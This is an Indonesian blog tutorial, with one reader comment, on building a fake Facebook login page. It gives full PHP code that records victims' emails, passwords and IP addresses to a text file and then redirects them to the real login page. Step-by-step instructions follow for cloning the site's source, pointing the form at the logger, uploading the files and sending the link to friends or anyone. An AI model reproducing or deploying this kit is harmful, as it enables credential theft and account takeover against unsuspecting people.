Pada prinsipnya sama aja, tinggal kita hanya mengganti beberapa perintah.
Penasaran?
Nah yang harus kita siapkan adalah 2 buah file yang bernamalogs.php dan logs.txt (Terserah kalian lah mau kasih nama apa… ).
logs.php
<?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
window.location=\"https://login.facebook.com/login.php?login_attempt=1\";
</script>";
?>
Perhatikan, untuk kedepannya yang perlu kalian ubah adalah perintah ini$username = $_POST['email']; $password = $_POST['pass'];Dan ini…
window.location=\"https://login.facebook.com/login.php?login_attempt=1\";Dah inget aja itu dulu, ngerti belakangan aja… Sekarang target kita maunya apa? Facebook? Oke.
Buka Facebook dan liat source codenya / CTRL+U…
Yang perlu kalian cari adalah INPUT ID dari kedua TEXT FIELD berikut…
Kalo emang gak tau cara nyarinya, didalam text field tersebut kan ada tulisan Email dan Password. Copy aja dan coba search.
Done, ternyata untuk Email IDnya adalah email dan untuk Password IDnya pass. Buka logs.php dan ganti baris berikut.
$username = $_POST['email']; $password = $_POST['pass'];Nah pada contoh kali ini sudah sama yaitu email dan pass (ituloh yang ada di dalam $_POST). Kemudian pada baris
window.location=\"https://login.facebook.com/login.php?login_attempt=1\";Ganti URLnya jadi alamat asli atau alamat tempat sang korban ter-redirect ketika melakukan login pada Fake Login yang telah kita buat. Pada contoh kali ini adalah alamat asli login facebook.
Langkah selanjutnya adalah mengcopy seluruh source code facebook dan simpan di dalam index.php (buat dulu filenya.).
Gunakan fasilitas search dan cari kata form method dan liataction-nya.
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form">Kalau di facebook form actionnya adalah “https://login.facebook.com/login.php?login_attempt=1” nah ganti menjadi logs.php.
Ingat, gak semua website memiliki 1 form action…Kadang ada yang punya lebih dari satu. Kalo facebook kan ada yang untuk login dan register.
Pokoknya teliti dan cari yang berhubungan sama LOGIN. Kemudian upload ketiga file tersebut dan kasih linknya ke teman kamu.
Belom ngerti juga?
Kalian harus ingat langkah – langkahnya yah…
1. Cari website yang mau dibuatin fake loginnya.
2. Cari INPUT ID dari TEXT FIELD atau tempat kita nulis email dan passwordnya.
3. Setelah dapet buka logs.php dan ganti pada bagian ini $_POST['email'];
4. Ganti juga bagian ini window.location=\”https://login.facebook.com/login.php?login_attempt=1\”; untuk me-redirect korban ketika melakukan login pada fake login kita (disarankan untuk me-redirect ke halaman login aslinya.
5. Copy keseluruhan source code dari website aslinya pada index.php dan cari form method yang berhubungan dengan login dan ganti actionnya menjadi logs.php.
6. Upload ketiga file tersebut, kasih linknya ke siapa saja dan tunggu hasilnya.
1 comment
uuploadx gmana gan?
Posting Komentar - Back to Content